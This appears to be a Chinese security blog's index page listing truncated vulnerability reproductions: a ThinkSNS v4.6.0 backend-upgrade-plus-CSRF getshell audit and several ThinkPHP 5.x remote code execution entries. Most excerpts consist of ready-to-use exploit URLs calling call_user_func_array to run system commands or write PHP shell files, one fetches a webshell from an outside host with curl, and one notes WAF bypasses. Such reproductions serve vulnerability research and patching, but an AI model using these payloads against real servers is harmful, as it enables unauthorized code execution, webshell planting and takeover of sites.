展开菜单

代码审计之ThinkSNS v4.6.0最新版前台getshell

代码审计之ThinkSNS v4.6.0最新版前台getshell

*前言* 对于一个后台的至getshell的漏洞点,若需要当作前台来利用,最直接的idea会想到什么?当然是XSS、CSRF了,这已经不是什么新鲜话题或trick了,较早的wordpress 前台XSS之Getshell、最近安全客也有人发过zzzphp1.6前台的Getshell方式使用类似的方法。所以笔者对ThinkSNS审计的后台漏洞分析及其利用同样结合CSRF进行。 漏洞类型 通用漏洞 简介 后台升级存在逻辑错误与变量覆盖未验证升级链接参数upurl导致可升级远程下载shell结合后台csrf漏...

Thinkphp 5.1.29

Thinkphp 5.1.29 一、漏洞简介 二、漏洞影响 三、复现过程 1、代码执行 http://www.xxx.org/?s=index/\think\Request/input&filter=phpinfo&data=1 http://www.xxx.org/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 http://www.xxx.org/...

Thinkphp 5.1.18

Thinkphp 5.1.18 一、漏洞简介 二、漏洞影响 三、复现过程 1、常规poc http://www.xxxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('index_bak2.php',file_get_contents('h...

Thinkphp 5.0.23

Thinkphp 5.0.23 一、漏洞简介 二、漏洞影响 三、复现过程 POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: applic...

Thinkphp 5.0.22

Thinkphp 5.0.22 一、漏洞简介 二、漏洞影响 三、复现过程 1、poc http://xxx.org/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 2、poc http://xxxx.org/?s=index/\think\app/invokefunction&function=call_user_func_arra...

Thinkphp 5.0.21

Thinkphp 5.0.21 一、漏洞简介 二、漏洞影响 三、复现过程 1、poc http://xxxx.org/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 2、poc http://xxxxxx.org/thinkphp_5.0.21/?s=index/\think\app/invokefuncti...

Thinkphp 5.0.18

Thinkphp 5.0.18 一、漏洞简介 二、漏洞影响 三、复现过程 1、windows http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][0]=1 http://www.xxxx.com/?s=admin/\think\app/invokefunction&function=call_user_func_array&...

Thinkphp 5.0.14

Thinkphp 5.0.14 一、漏洞简介 二、漏洞影响 三、复现过程 1、常规命令 ?s=index/think\app/invokefunction&function=&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php.jpg&vars[1][]=%3C?php%20phpinfo();?3E 2、eval('')和assert('')被拦截,命令函数被禁止 h...

Thinkphp 5.0.11

Thinkphp 5.0.11 一、漏洞简介 二、漏洞影响 三、复现过程 http://www.0-sec.org/?s=admin/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=curl https://www.hack.com/xxx.js -o ./upload/xxx.php

Thinkphp 5.0.5

Thinkphp 5.0.5 一、漏洞简介 二、漏洞影响 三、复现过程 waf对eval进行了拦截 禁止了assert函数对eval函数后面的括号进行了正则过滤 对file_get_contents函数后面的括号进行了正则过滤 http://www.xxxx.org/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_c...